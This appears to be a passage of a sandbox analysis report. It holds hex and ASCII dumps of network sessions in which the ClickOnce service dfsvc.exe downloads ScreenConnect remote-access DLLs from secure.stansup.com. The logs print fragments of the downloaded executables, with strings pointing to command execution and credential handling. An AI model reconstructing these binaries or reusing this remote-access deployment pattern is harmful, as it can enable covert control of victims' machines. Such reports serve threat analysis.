                                                                                                                                                                                                                                                        2024-10-25 17:27:37 UTC16384INData Raw: fc 00 00 04 16 d3 28 84 00 00 0a 2d c3 16 2a 1e 02 7b f8 00 00 04 2a 1a 73 7b 01 00 0a 7a 32 02 7b f8 00 00 04 8c cb 00 00 01 2a 00 00 13 30 02 00 3c 00 00 00 88 00 00 11 02 7b f7 00 00 04 1f fe 33 1d 02 7b f9 00 00 04 28 4e 03 00 0a 6f 4f 03 00 0a 33 0b 02 16 7d f7 00 00 04 02 0a 2b 07 16 73 4b 03 00 06 0a 06 02 7b fb 00 00 04 7d fa 00 00 04 06 2a 1e 02 28 51 03 00 06 2a 7a 02 28 2c 00 00 0a 02 03 7d fd 00 00 04 02 28 4e 03 00 0a 6f 4f 03 00 0a 7d ff 00 00 04 2a 06 2a 00 00 00 13 30 05 00 d5 00 00 00 89 00 00 11 02 7b fd 00 00 04 0a 06 2c 09 06 17 3b 8d 00 00 00 16 2a 02 15 7d fd 00 00 04 1f 09 0b 02 17 07 25 17 58 0b 1f 1f 5f 62 8d d8 00 00 01 7d 00 01 00 04 02 7b 00 01 00 04 8e 69 d0 d8 00 00 01 28 51 00 00 0a 28 0f 02 00 0a 5a 0c 02 7b 00 01 00 04 08
                                                                                                                                                                                                                                                        Data Ascii: (-*{*s{z2{*0<{3{(NoO3}+sK{}*(Q*z(,}(NoO}**0{,;*}%X_b}{i(Q(Z{
                                                                                                                                                                                                                                                        2024-10-25 17:27:37 UTC16384INData Raw: 00 37 cc 76 22 06 00 7e 54 76 22 06 00 81 90 76 22 06 00 66 a3 76 22 06 00 43 aa 76 22 06 00 ad cf 79 22 06 00 bc 45 79 22 06 00 54 46 76 22 06 00 ce 58 76 22 06 00 6c bf 76 22 06 00 f8 69 76 22 06 00 56 9f 76 22 06 00 af 60 76 22 06 00 fe ce 76 22 06 00 bb 5f 76 22 06 00 d3 51 2d 25 06 00 99 be 76 22 06 00 11 be 76 22 06 10 24 51 ff 25 06 06 80 30 af 08 56 80 36 c8 03 26 56 80 1f c8 03 26 06 06 80 30 af 08 56 80 fc 9c 08 26 06 06 80 30 af 08 56 80 62 27 0d 26 56 80 90 29 0d 26 56 80 b9 0d 0d 26 56 80 86 29 0d 26 06 06 80 30 76 22 56 80 2c 39 12 26 56 80 4d c8 12 26 56 80 5f 39 12 26 56 80 16 bd 12 26 56 80 d2 9b 12 26 56 80 e8 c0 12 26 56 80 72 7f 12 26 56 80 12 c8 12 26 56 80 ae 9b 12 26 56 80 71 88 12 26 56 80 c1 6c 12 26 56 80 b0 6c 12 26 56 80 88 6b
                                                                                                                                                                                                                                                        Data Ascii: 7v"~Tv"v"fv"Cv"y"Ey"TFv"Xv"lv"iv"Vv"`v"v"_v"Q-%v"v"$Q%0V6&V&0V&0Vb'&V)&V&V)&0v"V,9&VM&V_9&V&V&V&Vr&V&V&Vq&Vl&Vl&Vk
                                                                                                                                                                                                                                                        2024-10-25 17:27:37 UTC16384INData Raw: a5 00 00 00 00 83 00 c1 07 09 3b 0d 07 71 a5 00 00 00 00 91 18 df 98 16 27 0e 07 7d a5 00 00 00 00 86 18 b4 98 01 00 0e 07 85 a5 00 00 00 00 83 00 8e 02 27 3b 0e 07 8d a5 00 00 00 00 83 00 14 0a 27 3b 0f 07 95 a5 00 00 00 00 86 18 b4 98 05 00 10 07 b4 a5 00 00 00 00 e1 01 73 58 01 00 11 07 ec a5 00 00 00 00 e1 01 ed c1 3d 00 11 07 b8 a7 00 00 00 00 81 00 ab 0d 01 00 11 07 d4 a7 00 00 00 00 e1 09 86 bb e8 18 11 07 dc a7 00 00 00 00 e1 01 c9 b5 01 00 11 07 e3 a7 00 00 00 00 e1 09 4c bc 4e 00 11 07 ec a7 00 00 00 00 e1 01 84 97 2e 3b 11 07 40 a8 00 00 00 00 e1 01 50 98 64 00 11 07 00 00 01 00 80 6b 00 00 01 00 68 a5 00 00 01 00 80 6b 00 00 01 00 bd 5e 00 00 01 00 68 a5 00 00 01 00 bd 5e 00 00 01 00 ba 74 00 00 01 00 02 a7 00 00 01 00 ba 74 00 00 01 00 8c ca
                                                                                                                                                                                                                                                        Data Ascii: ;q'}';';sX=LN.;@Pdkhk^h^tt
                                                                                                                                                                                                                                                        2024-10-25 17:27:37 UTC16384INData Raw: 4c 7c 04 39 02 fc 6f 89 01 99 02 a9 6a 7c 04 99 02 ef 58 43 1b 99 07 e2 6a 3d 0b 4c 04 6f 98 5b 00 54 04 6b bc 49 00 44 02 81 0d d9 00 08 00 14 00 2d 1c 08 00 18 00 32 1c 08 00 1c 00 37 1c 08 00 20 00 3c 1c 08 00 b8 00 41 1c 0e 00 bc 00 46 1c 0e 00 c0 00 59 1c 0e 00 c4 00 6a 1c 08 00 c8 00 7d 1c 08 00 cc 00 82 1c 0e 00 d0 00 87 1c 0e 00 d4 00 96 1c 0e 00 d8 00 a5 1c 0e 00 e0 00 ce 1c 08 00 f0 00 6c 1d 08 00 f4 00 71 1d 08 00 f8 00 76 1d 08 00 1c 01 2d 1c 08 00 20 01 32 1c 08 00 24 01 37 1c 09 00 28 01 32 1c 09 00 2c 01 37 1c 09 00 30 01 7b 1d 09 00 34 01 80 1d 09 00 38 01 32 1c 09 00 3c 01 37 1c 09 00 40 01 32 1c 09 00 44 01 37 1c 09 00 48 01 7b 1d 09 00 4c 01 80 1d 09 00 50 01 85 1d 09 00 54 01 8a 1d 09 00 58 01 8f 1d 09 00 5c 01 94 1d 09 00 60 01 99 1d
                                                                                                                                                                                                                                                        Data Ascii: L|9oj|XCj=Lo[TkID-27 <AFYj}lqv- 2$7(2,70{482<7@2D7H{LPTX\`
                                                                                                                                                                                                                                                        2024-10-25 17:27:37 UTC16384INData Raw: 6e 49 6e 66 6f 73 3e 62 5f 5f 32 38 5f 31 00 3c 3e 39 5f 5f 38 5f 31 00 3c 50 6f 70 75 6c 61 74 65 43 6f 6e 74 65 78 74 4d 65 6e 75 53 74 72 69 70 49 74 65 6d 73 3e 62 5f 5f 38 5f 31 00 3c 3e 63 5f 5f 44 69 73 70 6c 61 79 43 6c 61 73 73 31 35 39 5f 31 00 55 53 45 52 5f 49 4e 46 4f 5f 31 00 3c 52 65 70 6c 61 63 65 57 6e 64 50 72 6f 63 3e 62 5f 5f 31 00 3c 52 75 6e 43 6f 6d 6d 61 6e 64 4c 69 6e 65 50 72 6f 67 72 61 6d 3e 62 5f 5f 31 00 3c 47 65 74 44 65 73 6b 74 6f 70 57 69 6e 64 6f 77 48 61 6e 64 6c 65 73 3e 62 5f 5f 31 00 3c 47 65 74 57 69 6e 64 6f 77 48 61 6e 64 6c 65 73 3e 62 5f 5f 31 00 3c 47 65 74 44 65 73 63 65 6e 64 65 6e 74 57 69 6e 64 6f 77 48 61 6e 64 6c 65 73 3e 62 5f 5f 31 00 3c 47 65 74 57 69 6e 64 6f 77 53 74 61 74 69 6f 6e 4e 61 6d 65 73 3e
                                                                                                                                                                                                                                                        Data Ascii: nInfos>b__28_1<>9__8_1<PopulateContextMenuStripItems>b__8_1<>c__DisplayClass159_1USER_INFO_1<ReplaceWndProc>b__1<RunCommandLineProgram>b__1<GetDesktopWindowHandles>b__1<GetWindowHandles>b__1<GetDescendentWindowHandles>b__1<GetWindowStationNames>
                                                                                                                                                                                                                                                        2024-10-25 17:27:37 UTC16384INData Raw: 6c 65 00 4d 6f 76 65 46 69 6c 65 00 70 43 6f 6e 66 69 67 46 69 6c 65 00 54 72 79 55 6e 62 6c 6f 63 6b 46 69 6c 65 00 4c 6f 61 64 52 65 73 6f 75 72 63 65 50 61 63 6b 46 72 6f 6d 46 69 6c 65 00 4d 61 70 46 69 6c 65 00 70 48 65 6c 70 46 69 6c 65 00 70 4f 75 74 70 75 74 46 69 6c 65 00 70 73 7a 46 69 6c 65 00 43 72 65 61 74 65 50 72 6f 66 69 6c 65 00 44 65 6c 65 74 65 50 72 6f 66 69 6c 65 00 75 73 72 69 34 5f 70 72 6f 66 69 6c 65 00 70 70 66 69 6c 65 00 45 52 6f 6c 65 00 72 6f 6c 65 00 41 6c 6c 6f 63 43 6f 6e 73 6f 6c 65 00 46 72 65 65 43 6f 6e 73 6f 6c 65 00 77 42 69 74 73 50 65 72 53 61 6d 70 6c 65 00 6c 70 54 69 74 6c 65 00 41 64 64 41 63 63 65 73 73 52 75 6c 65 00 46 69 6c 65 53 79 73 74 65 6d 41 63 63 65 73 73 52 75 6c 65 00 53 65 74 41 63 63 65 73 73 52
                                                                                                                                                                                                                                                        Data Ascii: leMoveFilepConfigFileTryUnblockFileLoadResourcePackFromFileMapFilepHelpFilepOutputFilepszFileCreateProfileDeleteProfileusri4_profileppfileERoleroleAllocConsoleFreeConsolewBitsPerSamplelpTitleAddAccessRuleFileSystemAccessRuleSetAccessR
                                                                                                                                                                                                                                                        2024-10-25 17:27:37 UTC16384INData Raw: 4c 61 73 74 41 63 74 69 76 65 50 6f 70 75 70 00 41 70 70 44 6f 6d 61 69 6e 53 65 74 75 70 00 70 73 7a 56 65 6e 64 6f 72 53 65 74 75 70 00 66 43 6f 6e 74 65 78 74 52 65 71 00 53 79 73 74 65 6d 2e 4c 69 6e 71 00 50 72 6f 70 56 61 72 69 61 6e 74 43 6c 65 61 72 00 45 6e 73 75 72 65 53 74 61 72 74 73 57 69 74 68 43 68 61 72 00 43 6f 6e 76 65 72 74 42 6f 74 68 53 6c 61 73 68 65 73 54 6f 43 68 61 72 00 44 69 72 65 63 74 6f 72 79 53 65 70 61 72 61 74 6f 72 43 68 61 72 00 70 72 6f 70 76 61 72 00 65 5f 63 70 61 72 68 64 72 00 49 73 4d 65 6d 62 65 72 00 6d 61 67 69 63 4e 75 6d 62 65 72 00 64 77 42 75 69 6c 64 4e 75 6d 62 65 72 00 46 69 6c 65 48 65 61 64 65 72 00 77 61 76 65 49 6e 50 72 65 70 61 72 65 48 65 61 64 65 72 00 77 61 76 65 4f 75 74 50 72 65 70 61 72 65 48
                                                                                                                                                                                                                                                        Data Ascii: LastActivePopupAppDomainSetuppszVendorSetupfContextReqSystem.LinqPropVariantClearEnsureStartsWithCharConvertBothSlashesToCharDirectorySeparatorCharpropvare_cparhdrIsMembermagicNumberdwBuildNumberFileHeaderwaveInPrepareHeaderwaveOutPrepareH
                                                                                                                                                                                                                                                        2024-10-25 17:27:37 UTC16384INData Raw: 6c 79 00 70 6f 69 6e 74 6c 79 00 53 65 6c 65 63 74 4d 61 6e 79 00 53 68 75 74 64 6f 77 6e 42 6c 6f 63 6b 52 65 61 73 6f 6e 44 65 73 74 72 6f 79 00 42 6c 6f 63 6b 43 6f 70 79 00 61 6c 6c 6f 77 43 6f 70 79 00 65 6e 74 72 6f 70 79 00 54 72 79 00 54 6f 6b 65 6e 50 72 69 6d 61 72 79 00 54 6f 44 69 63 74 69 6f 6e 61 72 79 00 4c 6f 61 64 4c 69 62 72 61 72 79 00 46 72 65 65 4c 69 62 72 61 72 79 00 49 4e 61 74 69 76 65 4c 69 62 72 61 72 79 00 54 72 79 4c 6f 61 64 4e 61 74 69 76 65 4c 69 62 72 61 72 79 00 54 72 79 46 72 65 65 4e 61 74 69 76 65 4c 69 62 72 61 72 79 00 57 69 6e 64 6f 77 73 44 69 73 6b 4e 61 74 69 76 65 4c 69 62 72 61 72 79 00 57 69 6e 64 6f 77 73 4d 65 6d 6f 72 79 4e 61 74 69 76 65 4c 69 62 72 61 72 79 00 4f 62 6a 65 63 74 51 75 65 72 79 00 53 65 6c
                                                                                                                                                                                                                                                        Data Ascii: lypointlySelectManyShutdownBlockReasonDestroyBlockCopyallowCopyentropyTryTokenPrimaryToDictionaryLoadLibraryFreeLibraryINativeLibraryTryLoadNativeLibraryTryFreeNativeLibraryWindowsDiskNativeLibraryWindowsMemoryNativeLibraryObjectQuerySel


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        10192.168.2.94973279.110.49.1854431556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-10-25 17:27:42 UTC102OUTGET /Bin/ScreenConnect.ClientService.dll HTTP/1.1
                                                                                                                                                                                                                                                        Host: secure.stansup.com
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        2024-10-25 17:27:42 UTC215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                        Content-Length: 68096
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                        Date: Fri, 25 Oct 2024 17:27:42 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-10-25 17:27:42 UTC16169INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ab 6b f4 c6 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 02 01 00 00 06 00 00 00 00 00 00 ba 20 01 00 00 20 00 00 00 40 01 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 e1 02 02 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELk" 0 @ @
                                                                                                                                                                                                                                                        2024-10-25 17:27:42 UTC16384INData Raw: 00 0a 07 6f 11 00 00 0a 2d d0 de 0a 07 2c 06 07 6f 10 00 00 0a dc 06 7b 54 00 00 04 6f 24 02 00 0a 13 04 2b 5a 11 04 6f 25 02 00 0a 13 05 02 7b 53 00 00 04 7b 0d 00 00 04 11 05 73 26 02 00 0a 25 02 7b 52 00 00 04 28 f8 00 00 0a 7e 30 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 6d 00 00 06 73 06 02 00 0a 25 80 30 00 00 04 28 5f 00 00 2b 6f 27 02 00 0a 73 81 00 00 0a 6f 82 00 00 0a 11 04 6f 11 00 00 0a 2d 9d de 0c 11 04 2c 07 11 04 6f 10 00 00 0a dc 2a 01 1c 00 00 02 00 65 00 34 99 00 0a 00 00 00 00 02 00 b0 00 67 17 01 0c 00 00 00 00 1e 02 28 1d 00 00 0a 2a 56 02 7b 54 00 00 04 03 6f 23 02 00 0a 6f 28 02 00 0a 16 fe 01 2a 1e 02 28 1d 00 00 0a 2a 4a 02 7b 56 00 00 04 6f 29 02 00 0a 03 28 2a 02 00 0a 2a 1e 02 28 1d 00 00 0a 2a 00 00 00 13 30 03 00 43 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: o-,o{To$+Zo%{S{s&%{R(~0%-&~+ms%0(_+o'soo-,o*e4g(*V{To#o(*(*J{Vo)(**(*0C
                                                                                                                                                                                                                                                        2024-10-25 17:27:43 UTC16384INData Raw: 15 19 04 ae 2d 2d 15 19 04 cd 2e 37 15 b1 04 3c 27 3e 15 31 04 cb 31 78 09 29 04 e0 42 f6 00 e9 04 fe 42 56 15 f4 00 9b 18 81 02 31 04 a5 32 5c 15 f4 03 71 3a a1 00 fc 03 71 3a a1 00 19 04 ca 2d 85 15 11 03 71 3a 6a 04 09 03 5e 30 9e 15 d9 07 e5 35 a7 15 09 03 42 2c ad 15 e1 07 6b 29 06 00 19 03 5d 31 20 02 31 04 83 2d bd 15 29 04 84 31 6a 04 19 03 80 25 20 02 29 04 ad 25 6a 04 19 03 99 1b 20 02 29 04 c6 1b 6a 04 e1 07 61 29 06 00 21 03 f7 2e 20 02 d1 00 ea 49 c5 15 29 04 04 2f 6a 04 a9 04 31 3d b2 11 8c 03 8d 08 5a 04 e9 04 b2 49 bd 0a 04 04 f8 3e 46 00 8c 03 52 0b 5e 04 e9 04 cd 42 d8 15 31 04 e2 34 e0 15 29 04 e0 46 14 01 d1 01 9a 42 ef 15 5c 02 de 2c 63 00 09 02 e1 2e 14 01 69 02 c8 41 00 16 69 02 c3 17 14 01 29 05 7a 2d f6 00 59 03 d0 2d 06 16 a4 02
                                                                                                                                                                                                                                                        Data Ascii: --.7<'>11x)BBV12\q:q:-q:j^05B,k)]1 1-)1j% )%j )ja)!. I)/j1=ZI>FR^B14)FB\,c.iAi)z-Y-
                                                                                                                                                                                                                                                        2024-10-25 17:27:43 UTC16384INData Raw: 74 79 41 63 74 69 6f 6e 00 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 00 53 65 74 74 69 6e 67 73 50 72 6f 70 65 72 74 79 56 61 6c 75 65 43 6f 6c 6c 65 63 74 69 6f 6e 00 47 72 6f 75 70 43 6f 6c 6c 65 63 74 69 6f 6e 00 57 61 69 74 69 6e 67 46 6f 72 43 6f 6e 6e 65 63 74 69 6f 6e 00 57 69 6e 33 32 45 78 63 65 70 74 69 6f 6e 00 43 72 79 70 74 6f 67 72 61 70 68 69 63 45 78 63 65 70 74 69 6f 6e 00 4e 6f 74 53 75 70 70 6f 72 74 65 64 45 78 63 65 70 74 69 6f 6e 00 54 72 61 63 65 45 78 63 65 70 74 69 6f 6e 00 45 6e 64 4f 66 53 74 72 65 61 6d 45 78 63 65 70 74 69 6f 6e 00 52 75 6e 57 69 74 68 43 72 61 73 68 4f 6e 45 78 63 65 70 74 69 6f 6e 00 54 72 79 53 75 62 73 63 72 69 62 65 54 6f 4c 6f 67 41 70 70 44 6f 6d 61 69 6e 45 78 63 65 70 74 69 6f 6e 00 49 6e 76
                                                                                                                                                                                                                                                        Data Ascii: tyActionSystem.ReflectionSettingsPropertyValueCollectionGroupCollectionWaitingForConnectionWin32ExceptionCryptographicExceptionNotSupportedExceptionTraceExceptionEndOfStreamExceptionRunWithCrashOnExceptionTrySubscribeToLogAppDomainExceptionInv
                                                                                                                                                                                                                                                        2024-10-25 17:27:43 UTC2775INData Raw: 08 01 00 00 08 00 00 00 00 05 01 00 01 00 00 05 01 00 02 00 00 0a 01 00 02 00 00 00 00 01 00 00 20 01 00 03 00 00 00 09 53 65 73 73 69 6f 6e 49 44 04 4e 61 6d 65 08 55 73 65 72 4e 61 6d 65 00 00 0d 01 00 05 00 00 00 00 00 00 00 01 00 00 2d 01 00 02 00 00 00 1c 43 72 65 64 65 6e 74 69 61 6c 50 72 6f 76 69 64 65 72 49 6e 73 74 61 6e 63 65 49 44 07 4d 65 73 73 61 67 65 00 00 0b 01 00 03 00 00 00 00 01 01 00 00 33 01 00 03 00 00 00 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0b 43 6f 6d 6d 61 6e 64 4c 69 6e 65 0f 50 61 72 65 6e 74 50 72 6f 63 65 73 73 49 44 00 00 52 01 00 05 00 00 00 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0b 43 6f 6d 6d 61 6e 64 4c 69 6e 65 0f 50 61 72 65 6e 74 50 72 6f 63 65 73 73 49 44 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0f
                                                                                                                                                                                                                                                        Data Ascii: SessionIDNameUserName-CredentialProviderInstanceIDMessage3ExecutablePathCommandLineParentProcessIDRExecutablePathCommandLineParentProcessIDExecutablePath


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        11192.168.2.94973379.110.49.1854431556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-10-25 17:27:43 UTC93OUTGET /Bin/ScreenConnect.Core.dll HTTP/1.1
                                                                                                                                                                                                                                                        Host: secure.stansup.com
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        2024-10-25 17:27:44 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                        Content-Length: 548352
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                        Date: Fri, 25 Oct 2024 17:27:43 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-10-25 17:27:44 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 69 42 17 f7 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 56 08 00 00 06 00 00 00 00 00 00 c6 70 08 00 00 20 00 00 00 80 08 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 84 a2 08 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELiB" 0Vp @
                                                                                                                                                                                                                                                        2024-10-25 17:27:44 UTC16384INData Raw: 28 2b 00 00 2b 2c 07 02 06 7d 6e 01 00 0a 06 02 7b 6e 01 00 0a fe 01 2a 3e 03 6f 0e 07 00 06 04 6f 0e 07 00 06 fe 01 2a 3e 02 03 28 6f 01 00 0a 02 15 7d 70 01 00 0a 2a 13 30 03 00 33 01 00 00 3d 00 00 11 03 2d 0a 12 01 fe 15 81 00 00 1b 07 2a 02 03 28 71 01 00 0a 0a 03 6f 0e 07 00 06 02 7b 70 01 00 0a fe 01 06 5f 2c 42 02 7b 72 01 00 0a 8c 81 00 00 1b 2c 18 02 28 73 01 00 0a 02 fe 06 74 01 00 0a 73 75 01 00 0a 28 2c 00 00 2b 26 02 15 7d 70 01 00 0a 02 7c 72 01 00 0a fe 15 81 00 00 1b 12 01 fe 15 81 00 00 1b 07 2a 03 6f 0e 07 00 06 02 7b 70 01 00 0a 33 07 02 7b 72 01 00 0a 2a 06 2c 43 02 7b 76 01 00 0a 8c 81 00 00 1b 2c 18 02 28 73 01 00 0a 02 fe 06 77 01 00 0a 73 75 01 00 0a 28 2c 00 00 2b 26 02 03 6f 0e 07 00 06 7d 78 01 00 0a 02 28 2d 00 00 2b 7d 76 01
                                                                                                                                                                                                                                                        Data Ascii: (++,}n{n*>oo*>(o}p*03=-*(qo{p_,B{r,(stsu(,+&}p|r*o{p3{r*,C{v,(swsu(,+&o}x(-+}v
                                                                                                                                                                                                                                                        2024-10-25 17:27:44 UTC16384INData Raw: 73 c7 02 00 0a 0a 2b 26 03 04 73 c8 02 00 0a 0a 2b 1c 03 04 73 94 01 00 0a 0a 2b 12 72 b9 0c 00 70 02 8c b2 00 00 02 14 73 c9 02 00 0a 7a 06 2a 5a d0 8e 00 00 1b 28 3c 01 00 0a 02 28 ca 02 00 0a a5 8e 00 00 1b 2a 9e 03 02 7e d1 05 00 04 25 2d 17 26 7e d0 05 00 04 fe 06 a0 0e 00 06 73 cb 02 00 0a 25 80 d1 05 00 04 28 7f 00 00 2b 2a 00 1b 30 01 00 25 00 00 00 1e 00 00 11 02 28 cc 02 00 0a 2d 0a 12 00 fe 15 8e 00 00 1b 06 2a 00 03 6f 08 02 00 0a 0a de 07 02 28 2d 01 00 0a dc 06 2a 00 00 00 01 10 00 00 02 00 13 00 09 1c 00 07 00 00 00 00 3a 02 03 28 e2 04 00 06 28 80 00 00 2b 26 2a 00 1b 30 01 00 1a 00 00 00 75 00 00 11 02 0a 06 28 2c 01 00 0a 03 6f 08 02 00 0a 0b de 07 06 28 2d 01 00 0a dc 07 2a 00 00 01 10 00 00 02 00 08 00 09 11 00 07 00 00 00 00 3a 02 03
                                                                                                                                                                                                                                                        Data Ascii: s+&s+s+rpsz*Z(<(*~%-&~s%(+*0%(-*o(-*:((+&*0u(,o(-*:
                                                                                                                                                                                                                                                        2024-10-25 17:27:44 UTC16384INData Raw: 0a 03 6f 8c 01 00 0a 7e e3 05 00 04 25 2d 17 26 7e d0 05 00 04 fe 06 b2 0e 00 06 73 9f 02 00 0a 25 80 e3 05 00 04 28 b3 00 00 2b 28 67 04 00 06 28 72 00 00 2b 2a 6e 03 0f 00 28 14 04 00 0a 81 8e 00 00 1b 04 0f 00 28 15 04 00 0a 81 8f 00 00 1b 2a 3e 1f fe 73 93 0f 00 06 25 02 7d a0 06 00 04 2a ae 02 16 16 16 16 73 20 03 00 06 7e cf 05 00 04 25 2d 13 26 14 fe 06 3d 03 00 06 73 3b 04 00 0a 25 80 cf 05 00 04 28 d4 00 00 2b 2a 82 02 28 d5 00 00 2b 03 28 d5 00 00 2b 04 2d 04 16 6a 2b 02 15 6a 28 45 05 00 06 28 d6 00 00 2b 2a 26 02 03 66 5f 04 03 5f 60 2a 76 02 28 d5 00 00 2b 03 28 d5 00 00 2b 04 28 d5 00 00 2b 28 45 05 00 06 28 d6 00 00 2b 2a 3a 05 2c 09 02 03 04 28 d7 00 00 2b 2a 02 2a 00 00 13 30 02 00 13 00 00 00 33 00 00 11 02 28 d5 00 00 2b 03 28 d5 00 00
                                                                                                                                                                                                                                                        Data Ascii: o~%-&~s%(+(g(r+*n((*>s%}*s ~%-&=s;%(+*(+(+-j+j(E(+*&f__`*v(+(+(+(E(+*:,(+**03(+(
                                                                                                                                                                                                                                                        2024-10-25 17:27:44 UTC16384INData Raw: 72 10 14 00 70 a2 25 1b 02 28 51 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1c 72 22 14 00 70 a2 25 1d 02 28 53 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1e 72 34 14 00 70 a2 25 1f 09 02 28 55 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1f 0a 72 32 13 00 70 a2 25 1f 0b 02 28 57 07 00 06 28 4f 0b 00 06 a2 25 1f 0c 72 48 14 00 70 a2 25 1f 0d 02 28 59 07 00 06 0b 12 01 fe 16 29 01 00 02 6f 43 00 00 0a a2 25 1f 0e 72 68 14 00 70 a2 25 1f 0f 02 28 5b 07 00 06 0c 12 02 fe 16 2a 01 00 02 6f 43 00 00 0a a2 25 1f 10 72 80 14 00 70 a2 25 1f 11 02 28 5d 07 00 06 0d 12 03 28 2f 05 00 0a a2 28 2a 02 00 0a 2a 1e 02 28 4c 07 00 06 2a 1e 02 7b a1 02 00 04 2a 22 02 03 7d a1 02 00 04 2a 00 00 13 30 02 00 1f 00 00 00 5a 00 00 11 72 90 14 00 70 02 28 61 07 00 06 0a 12 00 fe 16 c1 00 00
                                                                                                                                                                                                                                                        Data Ascii: rp%(Q(%r"p%(S(%r4p%(U(%r2p%(W(O%rHp%(Y)oC%rhp%([*oC%rp%(](/(**(L*{*"}*0Zrp(a
                                                                                                                                                                                                                                                        2024-10-25 17:27:44 UTC16384INData Raw: 1b 0c 02 7c d7 03 00 04 08 07 28 82 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 51 01 00 11 02 7b d7 03 00 04 0a 06 0b 07 03 28 2d 06 00 0a 74 4f 00 00 1b 0c 02 7c d7 03 00 04 08 07 28 82 01 00 2b 0a 06 07 33 df 2a 56 02 28 2f 0a 00 06 02 03 7d d8 03 00 04 02 04 7d d9 03 00 04 2a 1e 02 7b d8 03 00 04 2a 1e 02 7b d9 03 00 04 2a 5a 03 02 28 37 0a 00 06 5a 1e 28 12 04 00 06 02 28 38 0a 00 06 58 2a 86 02 03 04 28 36 0a 00 06 02 05 75 95 00 00 02 7d da 03 00 04 02 05 75 94 00 00 02 7d db 03 00 04 2a 86 02 03 28 63 01 00 0a 03 2c 16 02 7b da 03 00 04 28 0f 04 00 06 02 7b db 03 00 04 28 0f 04 00 06 2a 00 00 13 30 07 00 e6 00 00 00 52 01 00 11 02 04 28 39 0a 00 06 0a 02 28 38 0a 00 06 16 fe 03 0b 02 7b da 03 00 04 2c 67 05 06 5a 0c 02 08 16 28 32
                                                                                                                                                                                                                                                        Data Ascii: |(+3*0)Q{(-tO|(+3*V(/}}*{*{*Z(7Z((8X*(6u}u}*(c,{({(*0R(9(8{,gZ(2
